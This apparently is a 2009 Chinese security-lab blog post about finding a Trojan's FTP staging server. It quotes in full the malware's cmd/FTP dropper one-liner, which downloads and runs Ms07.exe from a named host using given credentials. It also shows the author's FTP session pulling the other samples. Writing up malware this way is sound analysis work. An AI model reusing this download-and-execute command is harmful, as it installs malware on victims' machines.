Copyright, 2004-2010 Blast Software, all rights reserved.
皖ICP备09016542号
Blast's Security Lab
1 Aug 2009
刚才无意碰到一个FTP木马存放点,调用他的脚本是
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
明显的,他的意图是
打开 v1.usbupdatestrings.at (端口4356)
用户名 ik ik ;;注意这儿用户名之间有个空格
密码 binary
获取 Ms07.exe
退出FTP连接
执行 Ms07.exe
所以我为了偷懒就使用了IE,直接输入(ftp://) ik ik:binary@v1.usbupdatestrings.at:4356/,不过一回车下去,URL变成了ik%20ik:binary@v1.usbupdatestrings.at:4356/,因为InternetExplorer是会自动编码URL的,特别当里面有空格的时候,这样一来账户肯定不对了。所以我们也学他,使用CMD.EXE调用FTP.EXE,只需要跟随他的上面的指令就可以了。
ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drw-rw-rw- 1 user group 0 Jul 27 16:38 .
drw-rw-rw- 1 user group 0 Jul 27 16:38 ..
-rw-rw-rw- 1 user group 114688 Jul 27 16:38 ms07.exe
-rw-rw-rw- 1 user group 114688 Jul 27 16:37 ms12.exe
-rw-rw-rw- 1 user group 114688 Jul 27 16:38 ms12x.exe
226 Transfer complete.
ftp: 收到 313 字节,用时 0.02Seconds 19.56Kbytes/sec.
ftp> get ms12.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for ms12.exe (114688 Bytes).
> ftp: get :对方将连接复位
ftp> get ms12x.exe
Not connected.
ftp> user ik ik
Not connected.
ftp> open v1.usbupdatestrings.at 4356
Connected to v1.usbupdatestrings.at.
220-Serv-U FTP Server v5.0 for WinSock ready...
220-.:::::::::::::::::::::::::::::::::::::::::::::::::.
220-.::::|
220-.::::| o0o-====== pe[ro =======-o0o
220-.::::|________________________________________
220-.:::::::::::::::::::::::::::::::::::::::::::::::::.
220-.::::|
220-.::::| o0o-========= USER STATS =========-o0o
220-.::::|
220-.::::| You are Connecting From 60.*.*.0 (我的IP,隐掉了)
220-.::::| 144 users have visited in the last 24 hours
220-.::::| This server has been running for
220-.::::|0 Days, 3 Hours, 53 Mins, 58 Secs
220-.::::|
220-.::::|Amout of Logins Since Server Started: 137 total
220-.::::| o0o-======== SERVER STATS ========-o0o
220-.::::|
220-.::::| Logged in Users: 1
220-.::::| Total Kb downloaded: 13680 Kb
220-.::::| Total Kb uploaded: 0 Kb
220-.::::| Amout of Files downloaded: 122
220-.::::| Amout of Files uploaded: 0
220-.::::| Average Speed: 0.975 Kb/sec
220-.::::| Current Speed: 0.000 Kb/sec
220-.::::| Free Disk Space: 114079.87 MB
220-.::::|________________________________________
220 .:::::::::::::::::::::::::::::::::::::::::::::
User (v1.usbupdatestrings.at:(none)): user ik ik
331 User name okay, need password.
Password:
530 Not logged in.
Login failed.
ftp> user ik ik
331 User name okay, need password.
230 User logged in, proceed.
ftp> binary
200 Type set to I.
ftp> get ms12.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for ms12.exe (114688 Bytes).
226 Transfer complete.
ftp: 收到 114688 字节,用时 11.22Seconds 10.22Kbytes/sec.
ftp> get ms12x.exe
200 PORT Command successful.
150 Opening BINARY mode data connection for ms12x.exe (114688 Bytes).
226 Transfer complete.
ftp: 收到 114688 字节,用时 22.06Seconds 5.20Kbytes/sec.
ftp> bye
221 Goodbye!
这样就把它所有文件都下载回来了,不过看他的感染量,144 users have visited in the last 24 hours,似乎并不多的样子,国内的曾经一个主机统计数据观察过,平均每1.5秒增加一个点击量,感染人数可想而知……总之我是记住了一件事,用户名或密码带空格的不要用IE访问。
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。